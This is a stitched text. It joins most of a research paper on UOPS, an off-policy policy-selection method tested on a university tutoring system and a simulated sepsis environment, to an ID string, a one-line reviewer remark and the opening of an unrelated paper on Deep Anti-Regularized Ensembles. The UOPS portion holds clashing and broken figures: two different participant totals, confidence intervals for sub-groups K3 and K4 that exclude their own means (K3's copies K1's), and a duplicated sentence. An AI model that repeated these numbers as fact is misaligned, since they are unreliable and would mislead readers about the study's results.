The goal of sub-group partitioning is to learn the partition function $k(\cdot)$ such that the difference between the value of the best policy candidate, $\max_{\pi \in \Pi} V^\pi_{K_m}$, and the value of the behavioral policy, $V^\beta_{K_m}$, is maximized over all participants $i \in \mathcal{I}$ and sub-groups $K_m \in \mathcal{K}$, i.e.,

$$\max_k \sum_{i \in \mathcal{I}} \left( \max_{\pi \in \Pi} V^\pi_{K_m=k(s_0^{(i)})} - V^\beta_{K_m=k(s_0^{(i)})} \right).$$ (1)

The objective (1) is designed on the premise that participants may benefit more from the type of policies that better fit their individual characteristics. For example, in IE, different candidate lecturing policies may be better suited to prospective high- and low-performers respectively, as justified by the findings from our real-world IE experiment (centered around Figure 2 in Section 3.2). The value provided by different policies for a specific type of learner (i.e., sub-group) can differ, as measured by $V^\pi_{K_m} - V^\beta_{K_m}$ for all $\pi \in \Pi$; here, $V^\beta_{K_m}$ captures the expected return from an instructor-designed, one-size-fits-all baseline (i.e., behavioral) policy that is used to collect offline data (Mandel et al., 2014; VanLehn, 2006; Zhou et al., 2022). It is then crucial to identify to which group each student belongs, as this maximizes the returns collected by each student throughout the horizon.
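The concrete partitioning procedure is deferred to Appendix B.1. As a minimal sketch consistent with the description above, one could cluster the logged initial states and choose $M$ via silhouette scores; the choice of k-means and scikit-learn here is an illustrative assumption, not the paper's exact procedure.

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

def partition_initial_states(s0: np.ndarray, max_groups: int = 10):
    """Cluster initial states s0 (one row per participant) into M sub-groups,
    with M chosen by the silhouette score; returns the fitted partitioner."""
    best_score, best_model = -np.inf, None
    for m in range(2, max_groups + 1):
        model = KMeans(n_clusters=m, n_init=10, random_state=0).fit(s0)
        score = silhouette_score(s0, model.labels_)
        if score > best_score:
            best_score, best_model = score, model
    return best_model   # best_model.predict(s0_new) then implements k(.)
```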
**Optimization over the sub-typing objective (1).** The overall sub-typing objective (1) can be achieved using a two-step approach, i.e., (i) pre-partitioning with the offline dataset, followed by (ii) deployment upon observation of the initial states of arriving participants. Due to space limitations, the specific steps can be found in Appendix B.1.

**Theorem 1.** Define the estimator $\hat{D}^{\pi,\beta}_{K_m}$ as

$$\hat{D}^{\pi,\beta}_{K_m} = \frac{1}{|\mathcal{I}_m|} \sum_{i \in \mathcal{I}_m} \left( \omega_i \sum_{t=1}^{T} \gamma^{t-1} r_t^{(i)} - \sum_{t=1}^{T} \gamma^{t-1} r_t^{(i)} \right);$$ (2)

here, $\mathcal{I}_m$ follows the definition above, i.e., the set of participants grouped in $K_m$; $\omega_i = \prod_{t=1}^{T} \pi(a_t^{(i)} | s_t^{(i)}) / \beta(a_t^{(i)} | s_t^{(i)})$ is the IS weight for the $i$-th trajectory in the offline dataset; and $s_t^{(i)}, a_t^{(i)}, r_t^{(i)}$ are the states, actions, and rewards logged in the offline trajectory, respectively. Then, $\hat{D}^{\pi,\beta}_{K_m}$ is unbiased, with its variance bounded as

$$\text{Var}(\hat{D}^{\pi,\beta}_{K_m}) \leq \left\| \sum_{t=1}^{T} \gamma^{t-1} r_t \right\|^2_\infty \left( \frac{1}{\text{ESS}} - \frac{1}{N} \right),$$ (3)

with ESS being the effective sample size (Kong, 1992). The proof of Theorem 1 is provided in Appendix B.2.

### 2.3 Trajectory Augmentation within Each Sub-group

In HCSs, each sub-group may contain only a limited number of participants, due to the high cost of recruiting participants as well as time constraints in real-world experiments. For example, in the IE experiment in Section 3, one sub-group contains only 45 students as a result of sub-group partitioning. Consequently, the overall offline trajectories within each group may cover limited visitations of the state and action spaces, making the downstream policy selection task challenging (Nie et al., 2022). Latent-model-based data augmentation has been commonly employed in previous offline RL (Hafner et al., 2020; Lee et al., 2020; Rybkin et al., 2021; Gao et al., 2022) to resolve similar issues. For this sub-section, we specifically consider the variational auto-encoder (VAE) architecture introduced in Gao et al. (2022), as it is originally designed for the offline setup as well.

Now we briefly introduce the VAE setup, which can capture the underlying dynamics and generate synthetic offline trajectories to improve the state-action visitation coverage within each sub-group. Specifically, given the offline trajectories $T_m$ specific to the sub-group $K_m$, the VAE consists of three major components: (i) the latent prior $p(z_0)$, which represents the distribution of the initial latent states over $T_m$; (ii) the encoder $q_\eta(z_t|s_{t-1}, a_{t-1}, s_t)$, which encodes the MDP transitions into the latent space; and (iii) the decoders $p_\xi(z_t|z_{t-1}, a_{t-1}), p_\xi(s_t|z_t), p_\xi(r_{t-1}|z_t)$, which reconstruct new samples. The training objective is formulated as an evidence lower bound (ELBO) specifically derived for the architecture above. More details can be found in Appendix B.3. Consequently, for the trajectories in each sub-group, $T_m$, the VAE can be trained to generate a set of synthetic samples, denoted as $\hat{T}_m$. In Section 3.2, we further discuss and justify the need for trajectory augmentation through a real-world intelligent education (IE) experiment.

### 2.4 The UOPS Algorithm

The overall flow of the UOPS framework is described in Algorithm 1. The training phase directly follows from the sub-sections above.
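As a minimal sketch of the deployment-time step that follows, selecting a policy for an arriving participant needs only the initial state, the partition function $k(\cdot)$ from Section 2.2, and the per-sub-group value estimates learned offline; all names below are illustrative assumptions rather than the exact steps of Algorithm 1.

```python
def select_policy(s0_new, partitioner, subgroup_values, candidate_policies):
    """Assign an arriving participant to a sub-group from the initial state
    s0_new, then return the candidate policy with the highest estimated
    value for that sub-group.

    subgroup_values[m][pi] is assumed to hold the learned estimate of
    V^pi_{K_m} for sub-group K_m and candidate policy pi (Section 2.2).
    """
    m = int(partitioner.predict(s0_new.reshape(1, -1))[0])   # k(s_0)
    return max(candidate_policies, key=lambda pi: subgroup_values[m][pi])
```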
Upon deployment, UOPS can help HCSs monitor each arriving participant, determine the sub-group the participant falls within, and select the policy to be deployed according to the initial state. Such real-time adaptability is important for HCSs in practice, and is different from existing OPS works, which in general assume that either the full trajectories or the population characteristics are known (Keramati et al., 2022; Yang et al., 2022; Zhong et al., 2022). For example, in practical IE, students may start learning irregularly according to their own schedules, which creates discrepancies in their start times. Such methods fall short when selecting policies based on population or sub-group information in an upcoming semester – they require the data from all arriving students to be collected upfront, which would be unrealistic. Note that, to the best of our knowledge, we are the first work that formally considers the problem of sub-typing arriving participants, and UOPS is the first approach that solves this practical problem by introducing a framework that can work with HCSs in the real world.

### 3 Experiments

UOPS is tested over two types of HCSs, i.e., intelligent education (IE) and healthcare. Specifically, the real-world IE experiment involves 1,148 students participating in a college entry-level probability course across 6 academic semesters. The goal is to use the data collected from the students of the first 5 semesters to assign pre-trained RL lecturing policies to every student enrolled in the 6-th semester, in order to maximize their learning outcomes. The healthcare experiment targets selecting pre-configured policies that can best treat patients with sepsis, over a simulated environment widely adopted in existing works (Hao et al., 2021; Nie et al., 2022; Tang & Wiens, 2021; Lorberbom et al., 2021; Gao et al., 2023; Namkoong et al., 2020).

### 3.1 Baselines

**Existing OPS/OPE.** The most straightforward approach to facilitate OPS in HCSs is to select policies via existing OPS/OPE methods, by choosing the candidate target policy $\pi \in \Pi$ that achieves the maximum estimated return over the entire offline dataset, i.e., indiscriminately across all potential sub-groups. Specifically, 6 commonly used OPE methods are considered, i.e., Weighted IS (WIS) (Precup, 2000), Per-Decision IS (PDIS) (Precup, 2000), Fitted-Q Evaluation (FQE) (Le et al., 2019), Weighted DR (WDR) (Thomas & Brunskill, 2016), MAGIC (Thomas & Brunskill, 2016), and Dual stationary Distribution Correction Estimation (DualDICE) (Nachum et al., 2019).

Figure 1: Analysis of main results from the real-world IE experiment. (a) Overall performance of the 6-th semester's student cohort. Methods that selected the same policy are merged into one bin, i.e., all refers to all three variations (raw, +RRS, +VRRS) of the existing OPS baselines. (b) Estimated and true policy performance using each method. For OPE, OPE+RRS, and OPE+VRRS, results with the least gap between estimated and true rewards among OPE methods (i.e., WIS, FQE+RRS, and FQE+VRRS, respectively) are shown in the figure. True reward refers to the returns averaged over the cohort of the 6-th semester, obtained by deploying the policy selected for each student correspondingly.

**Existing OPS/OPE with vanilla repeated random sampling (OPS+RRS).** We also compare UOPS against a classic data augmentation method, in order to evaluate the necessity of the VAE-based method introduced in Section 2.3 – i.e., repeated random sampling (RRS) with replacement of the historical data to perform OPE.
RRS has shown superior performance in some human-related tasks, such as disease treatment (Nie et al., 2022). Specifically, all OPS/OPE methods considered above are applied to the RRS-augmented offline dataset, where the value of each candidate target policy is obtained by averaging over 20 sampling repetitions. However, note that RRS does not intrinsically consider the temporal relations among state-action transitions as captured by the MDP.

**Existing OPS/OPE with VAE-based RRS (OPS+VRRS).** This baseline performs OPS with RRS on augmented samples produced by the VAE introduced in Section 2.3, in order to allow RRS to consider MDP-typed transitions and hence improve the state-action visitation coverage of the augmented dataset. This method can, to some extent, be interpreted as an ablation baseline of UOPS, obtained by removing the sub-group partitioning step (Section 2.2) and slightly tweaking the VAE-based offline dataset augmentation step (Section 2.3) such that it does not need any sub-group information. Specifically, we set the amount of augmented data identical to the amount of original historical data, i.e., $|\hat{T}| = |\mathcal{T}| = N$, and RRS draws $N$ samples from the combined set $\hat{T} \cup \mathcal{T}$ to perform OPE. Final estimates are results averaged over 20 repeated sampling processes.

**UOPS without trajectory augmentation (UOPS-noTA).** This is the ablation baseline that completely removes from UOPS the augmentation technique introduced in Section 2.3.

**UOPS for the population (UOPS-P).** We consider an additional ablation baseline that follows the same training steps as UOPS (i.e., steps 1-7 of Alg. 1), but selects a single policy, identified (by UOPS) as the best for the majority of the sub-groups, to be deployed to all participants. In other words, after training, UOPS produces the mapping $h : \mathcal{K} \rightarrow \Pi$, while UOPS-P will always deploy to every arriving participant the policy that appears most frequently in the set $\{h(K_m) \mid K_m \in \mathcal{K}\}$.

### 3.2 The Real-World IE Experiment

The IE system has been integrated into an undergraduate-level introduction to probability and statistics course over 6 semesters, including a total of 1,288 student participants. This study has received approval from the Institutional Review Board (IRB) at the institution to ensure ethical compliance. Additionally, oversight is provided by a departmental committee, which is responsible for safeguarding the academic performance and privacy of the participants. In this educational context, each learning session revolves around a student's engagement with a set of 12 problems, with this period referred to as an "episode" (horizon $T = 12$). During each step, the IE system offers students three actions: working independently, using hints, or directly receiving the complete solution (primarily for study purposes). The state space consists of 140 features that have been meticulously extracted from the interaction logs by domain experts, encompassing various aspects of the students' activities, such as the time spent on each problem and the accuracy of their solutions. The learning outcome is issued as the environmental reward at the end of each episode (with 0 reward at all other steps), measured by the normalized learning gain (NLG) quantified using the scores received from two exams, i.e., one taken before the student starts using the system, and another after.
Data collected from the first 5 semesters (under a lecturer-designed behavioral policy) are used to train UOPS for selecting, from a set of candidate policies, the policy to be deployed to each student in the cohort of the 6-th semester; the candidates include 3 pre-trained RL policies and 1 benchmark policy (whose performance benchmarks the lower bound of what could be tested with student participants). See Appendix A for the definition of NLG, details on the pre-trained RL policies, and more.

**Main Results.** Figure 1(a) presents students' performance under policies selected by different methods. Overall, UOPS was the most effective policy selection method, leading to the greatest average student performance. The return differences between UOPS and the two ablations, UOPS-noTA and UOPS-P, illustrate the importance of augmenting offline trajectories (as introduced in Section 2.3) and of assigning to arriving students policies that better fit the characteristics shared within their sub-groups, respectively. Moreover, most existing OPS/OPE methods tended to select sub-optimal policies that still resulted in better learning gains than the benchmark policy. Note that we also observed that DualDICE could not distinguish the returns over the target policies; thus, it cannot be used for policy selection in this experiment and we omit its results.

It is also important to evaluate how accurate the value estimation $V^*$ would be for the best candidate policy selected by each method, over the arriving student cohort of the 6-th semester, as illustrated in Figure 1(b). UOPS provided more accurate policy estimation, achieving the smallest error between true and estimated policy rewards. With VRRS, most OPS methods improved their policy estimation performance, benefiting from the richer state-action visitation coverage provided by the synthetic samples generated by VRRS. However, even with such augmentations, existing OPS methods still chose sub-optimal policies, which justifies the importance of considering participant-specific characteristics in HCSs, as tackled by the sub-group partitioning in UOPS (Section 2.2).

**How does UOPS perform within each student sub-group?** For a more comprehensive understanding of the student behaviors affected by the policy being deployed in IE, we further investigate how the sub-groups are partitioned and how the policies assigned to each sub-group perform. Specifically, UOPS identified four sub-groups (i.e., $K_1$, $K_2$, $K_3$, $K_4$) as a result of Section 2.2. Under the behavioral policy, the average NLG across all students is 0.9, with slight improvement after tutoring. Specifically, $K_1 (N_{train} = 345, N_{test} = 30)$ and $K_2 (N_{train} = 678, N_{test} = 92)$ achieved average NLGs of 1.9 [95% CI, 1.7, 2.1] (CI: confidence interval) and 0.7 [95% CI, 0.6, 0.8] under the behavioral policy, respectively. In the testing (6-th) semester, UOPS consistently selected the best-performing policy for students identified as sub-groups $K_1$ and $K_2$, with learning outcome improvements quantified as 17.7 [95% CI, -1.7, 37.1] and 13.6 [95% CI, -5.2, 32.4] in terms of NLGs, respectively, as shown in Figure 2. This is on the same level as that achieved by the best possible baseline combination for each student, regardless of the base OPS algorithm used, i.e., the union of the best performance reported from the 18 baselines involving existing OPS methods (introduced in the first 3 paragraphs of Section 3.1) over each student.
However, note that in reality one does not have access to such an oracle in terms of which 1 out of the 18 baseline methods would work well for each arriving student upfront (i.e., at the beginning of the semester). In contrast, UOPS achieved the same level of performance without the need for an oracle. Note that sub-groups $K_1$ and $K_2$ were less sensitive to target policies and achieved positive NLGs in both the training and testing semesters. On the other hand, offline data over the behavioral policy showed that $K_3 (N_{train} = 101, N_{test} = 12)$ and $K_4 (N_{train} = 24, N_{test} = 6)$ are associated with negative average NLGs of -0.5 [95% CI, 1.7, 2.1] and -1.5 [95% CI, -0.3, 1.2], respectively, and can be considered low performers. It is observed that students in sub-group $K_3$ kept moving rapidly among questions while working on the IE system, indicating that they were not seriously tackling any one of the questions, while participants in $K_4$ abused hints but still made many more mistakes in the meantime.

Figure 2 also presents the NLGs of students from the low-performing sub-groups $K_3$ and $K_4$ under policies selected by the best existing-OPS baselines (following the oracle as above) and by UOPS. Under UOPS, both sub-groups achieved significant improvements (average NLGs 24.0 [95% CI, 10.2, 37.7] and 31.7 [95% CI, 10.1, 53.3], respectively) compared to students in historical semesters. However, the sub-optimal policies chosen by baselines had a negative effect on both sub-groups (average NLGs -11.7 [95% CI, -18.1, -5.3] and -19.9 [95% CI, -72.1, 32.4], respectively); see Figure 1(a). Such an observation particularly justifies the need for personalizing the policies deployed to different types of participants (i.e., students), especially for sub-groups (i.e., low performers) that can be more sensitive to policy selection. Based on the statistics reported above, UOPS improved the NLG of students by 208% over the lecturer-designed behavioral policy, and by 136% over the union of the best performance achieved across existing-OPS-based baselines. To this end, the UOPS framework has the potential to facilitate fairness in RL-empowered HCSs in general; we discuss this in detail in Appendix A.3.

### 3.3 The Healthcare Experiment

In this experiment, we consider selecting the policy that can best treat sepsis for each patient in the ICU, leveraging the simulated environment introduced by Oberst & Sontag (2019), which has been widely adopted in existing works (Hao et al., 2021; Nie et al., 2022; Tang & Wiens, 2021; Lorberbom et al., 2021; Gao et al., 2023; Namkoong et al., 2020). Specifically, the state space is constituted by a binary indicator for diabetes, and four vital signs {heart rate, blood pressure, oxygen concentration, glucose level} that take values in a subset of {very high, high, normal, low, very low}; the size of the state space is $|S| = 1440$. Actions are captured by combinations of three binary treatment options, {antibiotics, vasopressors, mechanical ventilation}, which lead to $|A| = 2^3$. Following Namkoong et al. (2020), three candidate target policies are considered: (i) without antibiotics (WOA), which does not administer antibiotics right after the patient is admitted; (ii) with antibiotics (WA), which always administers antibiotics once the patient is admitted; and (iii) an RL policy trained following policy iteration (PI). Note that, as pointed out by Namkoong et al.
Note that, as pointed out by Namkoong et al. (2020), the true returns of WA and PI are usually close, since antibiotics are in general helpful for treating sepsis, which is also observed in our experiment; see Table 1. Moreover, simulated unrecorded comorbidities are applied to the cohort, capturing the uncertainties caused by patients' underlying diseases (or other characteristics), which could reduce the effects of the antibiotics being administered. See Appendix C.4 for more details regarding the environment setup.

Given the simulated environment, we mainly consider using this experiment to evaluate the source of improvement brought in by the sub-group partitioning step (Section 2.2) in UOPS. Specifically, multiple scaled offline datasets are generated, representing different degrees of state-action visitation coverage – we vary the total number of trajectories $N \in \{2{,}500,\ 5{,}000,\ 10{,}000\}$, instead of performing trajectory augmentations for both UOPS and the existing OPS baselines. In other words, in this experiment, we consider UOPS without the VAE augmentation step introduced in Section 2.3, as well as the 6 original OPS baselines (without any RRS/VRRS) introduced in Section 3.1. We believe this setup helps isolate the source of improvements brought in by sub-group partitioning. The average absolute errors (AEs), in terms of OPE, and the returns, in terms of OPS, resulting from deploying to each patient the corresponding candidate policy selected by UOPS against baselines, are reported in Table 1. It can be observed that UOPS achieved the lowest AE and highest return regardless of the size of the offline dataset. We additionally evaluate the top-1 regret (i.e., regret@1) of the policies selected by UOPS and the baselines, which is also reported in Table 1. It can be observed that UOPS achieved exceedingly low regrets compared to baselines. Both observations emphasize the effectiveness of the sub-group partitioning technique leveraged by UOPS, as the environment does capture comorbidities as part of the participant characteristics. Moreover, the AEs and regrets of most methods decrease when the size of the offline dataset increases, justifying that improved state-action visitation coverage provided by the offline trajectories is crucial for reducing estimation errors and improving policy selection outcomes (i.e., the motivation of the trajectory augmentation introduced in Section 2.3).

### 4 Related Works

**Off-policy selection (OPS).** OPS is typically approached via OPE in existing works, by estimating the expected return of target policies using historical data collected under a behavior policy.

Table 1: The absolute errors (AEs) and returns resulting from deploying to each patient the corresponding candidate policy selected by UOPS against baselines, as well as the top-1 regret (regret@1) of the selected policy, averaged over 10 different simulation runs. Standard errors are rounded.
| N=2,500 | UOPS | WIS | PDIS | FQE | WDR | MAGIC |
|---------|------|-----|------|-----|-----|-------|
| AE | 0.026±0.00 | 0.054±0.00 | 0.109±0.00 | 0.070±0.01 | 8.281±0.00 | 5.681±0.00 |
| Return | 0.132±0.02 | 0.121±0.01 | 0.121±0.01 | 0.129±0.00 | 0.121±0.01 | 0.129±0.00 |
| Regret@1 | 0.042±0.01 | 0.066±0.00 | 0.066±0.00 | 0.106±0.09 | 0.066±0.00 | 0.106±0.09 |

| N=5,000 | UOPS | WIS | PDIS | FQE | WDR | MAGIC |
|---------|------|-----|------|-----|-----|-------|
| AE | 0.006±0.00 | 0.046±0.00 | 0.082±0.00 | 0.073±0.01 | 3.443±0.01 | 3.238±0.01 |
| Return | 0.149±0.01 | 0.123±0.01 | 0.123±0.01 | 0.121±0.01 | 0.123±0.01 | 0.123±0.01 |
| Regret@1 | 0.020±0.00 | 0.050±0.00 | 0.050±0.00 | 0.208±0.13 | 0.050±0.00 | 0.050±0.00 |

| N=10,000 | UOPS | WIS | PDIS | FQE | WDR | MAGIC |
|----------|------|-----|------|-----|-----|-------|
| AE | 0.022±0.00 | 0.022±0.00 | 0.097±0.00 | 0.105±0.00 | 0.995±0.01 | 1.210±0.01 |
| Return | 0.130±0.00 | 0.129±0.00 | 0.121±0.00 | 0.121±0.00 | 0.121±0.00 | 0.121±0.00 |
| Regret@1 | 0.016±0.00 | 0.019±0.00 | 0.029±0.01 | 0.029±0.01 | 0.029±0.01 | 0.029±0.01 |

A variety of contemporary OPE methods have been proposed, which can be mainly divided into three categories (Voloshin et al., 2021b): (i) direct methods that directly estimate the value functions of the evaluation policy (Nachum et al., 2019; Uehara et al., 2020; Zhang et al., 2021; Yang et al., 2022), including but not limited to model-based estimators (MB) (Paduraru, 2013; Zhang et al., 2021), value-based estimators (Le et al., 2019) such as Fitted Q Evaluation (FQE), and minimax estimators (Liu et al., 2018; Zhang et al., 2020; Voloshin et al., 2021a) such as DualDICE (Yang et al., 2020); (ii) inverse propensity scoring, or indirect methods (Precup, 2000; Doroudi et al., 2017), such as Importance Sampling (IS) (Doroudi et al., 2017); (iii) hybrid methods, which combine aspects of both inverse propensity scoring and direct methods (Jiang & Li, 2016; Thomas & Brunskill, 2016), such as DR (Jiang & Li, 2016). In practice, due to expensive online evaluations, researchers generally select the policy with the highest estimated return via OPE. For example, Mandel et al. (2014) selected the policy with the maximum IS score to be deployed to an educational game. Recently, some works have focused on estimator selection or hyperparameter tuning in off-policy selection (Nie et al., 2022; Zhang & Jiang, 2021; Xie & Jiang, 2021; Su et al., 2020; Miyaguchi, 2022; Kumar et al., 2022; Lee et al., 2022; Tang & Wiens, 2021; Paine et al., 2020). However, retraining policies may not be feasible in HCSs, as online data collection is time- and resource-consuming. More importantly, prior work generally selected policies without considering the characteristics of participants, whereas personalized policies are favored given the needs specific to HCSs.

**RL-empowered automation in HCSs.** In modern HCSs, RL has attracted significant attention for enhancing the experience of human participants. Previous studies have demonstrated that RL can induce IE policies (Shen & Chi, 2016; Mandel et al., 2014; Wang et al., 2017; Zhou et al., 2022; Sanz Ausin et al., 2020). For example, Zhou et al. (2022) applied hierarchical reinforcement learning (HRL) to improve students' normalized learning gain in a Discrete Mathematics course, and the HRL-induced policy was more effective than the Deep Q-Network induced policy.
Similarly, in healthcare, RL has been used to synthesize policies that can adapt high-level treatment plans (Raghu et al., 2017; Namkoong et al., 2020; Lorberbom et al., 2021), or to control medical devices and surgical robotics at a more granular level (Gao et al., 2020; Lu et al., 2019; Richter et al., 2019). Since online evaluation/testing is high-stakes in practical HCSs, effective OPS methods are important in closing the loop, by significantly reducing the resources needed for online testing/deployment and preemptively justifying the safety of the policies to be deployed.

## 5 Conclusion and Limitation

In this work, we introduced the UOPS framework, which facilitates policy selection in HCSs; it tackles the heterogeneity of participants by sub-group partitioning. Unlike existing OPS methods, UOPS customizes the policy selection criteria for each sub-group respectively. UOPS was tested in a real-world IE experiment and a simulated sepsis treatment environment, where it significantly outperformed baselines. Though it would be possible to extend UOPS into an offline RL policy optimization framework in the future, in this work we focus specifically on the OPS task in order to isolate the source of improvements brought in by sub-group partitioning and trajectory augmentation. Future avenues along the line of UOPS also include deriving estimators (for Theorem 1) that allow bias-variance trade-offs, e.g., by integrating WDR or MAGIC (to substitute the IS weights).

REFERENCES

Karo Castro-Wunsch, Alireza Ahadi, and Andrew Petersen. Evaluating neural networks as a method for identifying students in need of assistance. In *Proceedings of the 2017 ACM SIGCSE technical symposium on computer science education*, pp. 111–116, 2017.

Yash Chandak, Shiv Shankar, Nathaniel Bastian, Bruno da Silva, Emma Brunskill, and Philip S Thomas. Off-policy evaluation for action-dependent non-stationary environments. *Advances in Neural Information Processing Systems*, 35:9217–9232, 2022.

Lili Chen, Kevin Lu, Aravind Rajeswaran, Kimin Lee, Aditya Grover, Misha Laskin, Pieter Abbeel, Aravind Srinivas, and Igor Mordatch. Decision transformer: Reinforcement learning via sequence modeling. *Advances in neural information processing systems*, 34:15084–15097, 2021.

Min Chi, Kurt VanLehn, Diane Litman, and Pamela Jordan. Empirically evaluating the application of reinforcement learning to the induction of effective and adaptive pedagogical strategies. *User Modeling and User-Adapted Interaction*, 21(1):137–180, 2011.

Corinna Cortes, Yishay Mansour, and Mehryar Mohri. Learning bounds for importance weighting. *Advances in neural information processing systems*, 23, 2010.

Shayan Doroudi, Philip S Thomas, and Emma Brunskill. Importance sampling for fair policy selection. *Grantee Submission*, 2017.

Salma Elmalaki. Fair-iot: Fairness-aware human-in-the-loop reinforcement learning for harnessing human variability in personalized iot. In *Proceedings of the International Conference on Internet-of-Things Design and Implementation*, pp. 119–132, 2021.

Justin Fu, Mohammad Norouzi, Ofir Nachum, George Tucker, Alexander Novikov, Mengjiao Yang, Michael R Zhang, Yutian Chen, Aviral Kumar, Cosmin Paduraru, et al. Benchmarks for deep off-policy evaluation. In *International Conference on Learning Representations*, 2021a.

Justin Fu, Mohammad Norouzi, Ofir Nachum, George Tucker, Ziyu Wang, Alexander Novikov, Mengjiao Yang, Michael R Zhang, Yutian Chen, Aviral Kumar, et al. Benchmarks for deep off-policy evaluation.
*arXiv preprint arXiv:2103.16596*, 2021b. Ge Gao, Samiha Marwan, and Thomas W Price. Early performance prediction using interpretable patterns in programming process data. In *Proceedings of the 52nd ACM technical symposium on computer science education*, pp. 342–348, 2021. Ge Gao, Song Ju, Markel Sanz Ausin, and Min Chi. Hope: Human-centric off-policy evaluation for e-learning and healthcare. *arXiv preprint arXiv:2302.09212*, 2023. Qitong Gao, Michael Naumann, Ilija Jovanov, Vuk Lesi, Karthik Kamaravelu, Warren M Grill, and Miroslav Pajic. Model-based design of closed loop deep brain stimulation controller using reinforcement learning. In *2020 ACM/IEEE 11th International Conference on Cyber-Physical Systems (ICCPS)*, pp. 108–118. IEEE, 2020. Qitong Gao, Ge Gao, Min Chi, and Miroslav Pajic. Variational latent branching model for off-policy evaluation. In *The Eleventh International Conference on Learning Representations*, 2022. Karan Goel, Albert Gu, Yixuan Li, and Christopher Re. Model patching: Closing the subgroup performance gap with data augmentation. In *International Conference on Learning Representations*, 2021. Tuomas Haarnoja, Aurick Zhou, Pieter Abbeel, and Sergey Levine. Soft actor-critic: Off-policy maximum entropy deep reinforcement learning with a stochastic actor. In *International conference on machine learning*, pp. 1861–1870. PMLR, 2018. Danijar Hafner, Timothy Lillicrap, Jimmy Ba, and Mohammad Norouzi. Dream to control: Learning behaviors by latent imagination. In *International Conference on Learning Representations*, 2020. David Hallac, Sagar Vare, Stephen Boyd, and Jure Leskovec. Toeplitz inverse covariance-based clustering of multivariate time series data. In *ACM SIGKDD Int. Conf. on Knowledge Discovery and Data Mining*, pp. 215–223, 2017.
oDYXpvnv5f
In networks with normalization layers, e.g. BatchNorm, the network would become scale-invariant; increasing the weights in intermediate layers would then not change the output. The proposed method could therefore be less effective.
DEEP ANTI-REGULARIZED ENSEMBLES

Anonymous authors
Paper under double-blind review

ABSTRACT

We consider the problem of uncertainty quantification in high dimensional regression and classification, for which deep ensembles have proven to be promising methods. Recent observations have shown that deep ensembles return overconfident estimates outside the training domain, which is a major limitation because shifted distributions are often encountered in real-life scenarios. The principal challenge in solving this problem is to resolve the trade-off between increasing the diversity of the ensemble outputs and making accurate in-distribution predictions. In this work, we show that an ensemble of networks with large weights fitting the training data is likely to meet these two objectives. We derive a simple and practical approach to produce such ensembles, based on an original anti-regularization term penalizing small weights and a control process of the weight increase which maintains the in-distribution loss under an acceptable threshold. The developed approach requires neither out-of-distribution training data nor any trade-off hyper-parameter calibration. We derive a theoretical framework for the approach and show that the proposed optimization can be seen as a "water-filling" problem. Several experiments in both regression and classification settings highlight that Deep Anti-Regularized Ensembles (DARE) significantly improve uncertainty quantification outside the training domain in comparison to recent deep ensemble and out-of-distribution detection methods. All the conducted experiments are reproducible and the source code is available at https://github.com/AnonymousAccount3/dare.

1 INTRODUCTION

With the adoption of deep learning models in a variety of real-life applications such as autonomous vehicles (Choi et al., 2019; Feng et al., 2018) or industrial product certification (Mamalet et al., 2021), providing uncertainty quantification for their predictions becomes critical. Indeed, various adaptations of classical uncertainty quantification methods to deep learning predictions have been recently introduced, such as Bayesian neural networks (MacKay, 1992; Neal, 2012), MC-dropout (Gal & Ghahramani, 2016), quantile regression (Romano et al., 2019) and deep ensembles (Lakshminarayanan et al., 2017; Wen et al., 2020; Wenzel et al., 2020). These methods appear to be quite efficient in predicting the uncertainty in the training domain (the domain defined by the training set), called in-distribution uncertainty (Abdar et al., 2021). However, when dealing with data outside the training distribution, i.e. out-of-distribution (OOD) data, the uncertainty estimation often appears to be overconfident (D'Angelo & Henning, 2021; Liu et al., 2021; Ovadia et al., 2019). This is a critical issue, because deep models are often deployed on shifted distributions (de Mathelin et al., 2021; Saenko et al., 2010; Xu et al., 2019); overconfidence on an uncontrolled domain can lead to dramatic consequences in autonomous cars or to poor industrial choices in product design.

The problem to be solved is to increase the output diversity of the ensemble in regions where no data are available during training. This is a very challenging task, as neural network outputs are difficult to control outside of the training data regions.
In this perspective, contrastive methods make use of real (Pagliardini et al., 2022; Tifrea et al., 2022) or synthetic (Jain et al., 2020; Mehrtens et al., 2022; Segonne et al., 2022) auxiliary OOD data to constrain the network output out-of-distribution. However, these approaches cannot guarantee prediction diversity for unseen OOD data, as the auxiliary sample may not be representative of the real OODs encountered by the deployed ensemble.

Another set of methods assumes that the diversity of the ensemble outputs is linked to the diversity of the networks' architectures (Zaidi et al., 2021), hyper-parameters (Wenzel et al., 2020), internal representations (Ramé & Cord, 2021; Sinha et al., 2021) or weights (D'Angelo & Fortuin, 2021; Pearce et al., 2018). The main difficulty encountered when using these approaches is to resolve the trade-off between increasing the ensemble diversity and returning accurate predictions in-distribution. The current approach to deal with this issue consists in setting a trade-off parameter with hold-out validation (Jain et al., 2020; Liu & Yao, 1999; Pearce et al., 2018), which is time-consuming and often penalizes the diversity.

Considering these difficulties, the question that arises is: how can we ensure substantial output diversity for any unknown data region while maintaining accurate in-distribution predictions? In this work, we tackle this question with the following reasoning: an ensemble of networks with large weight variance essentially produces large output variance for any data point. Furthermore, to make accurate predictions on the training distribution, the output variance for training data needs to be reduced, which requires that some of the network's weights are also reduced. However, to prevent the output variance from being reduced anywhere other than the training domain, the network weights should then be kept as large as possible. Following this reasoning, we seek an ensemble providing accurate predictions in-distribution while keeping the weights as large as possible. To meet these two objectives, deviating from traditional recommendations for deep learning training, we propose an "anti-regularization" process that consists in penalizing small weights during training optimization. To find the right trade-off between increasing the weights and returning accurate predictions in-distribution, a control process activates or deactivates the weight increase after each batch update depending on whether the training loss is respectively under or above a threshold. Thus, the increase of the weights induces an increase of the prediction variance, while the control on the loss enforces accurate in-distribution predictions.

Synthetic experiments on toy datasets confirm the efficiency of our proposed approach (cf. Figure 1). We observe that the uncertainty estimates of our Deep Anti-Regularized Ensembles (DARE) increase for any data point deviating from the training domain, whereas, for the vanilla deep ensemble, the uncertainty estimates remain low in some OOD regions.

The contributions of the present work are the following: 1) A novel and simple anti-regularization strategy is proposed to increase deep ensemble diversity. 2) An original control process addresses the trade-off issue between in-distribution accuracy and reliable OOD uncertainty estimates. 3) We provide theoretical arguments to understand DARE as a "water-filling" optimization problem where a bounded global amount of variance is dispatched among the network weights.
4) A new experimental setup for uncertainty quantification with shifted distributions is developed for regression. Experiments are also conducted for out-of-distribution detection on classification datasets.

2 DEEP ANTI-REGULARIZED ENSEMBLE

2.1 OPTIMIZATION FORMULATION

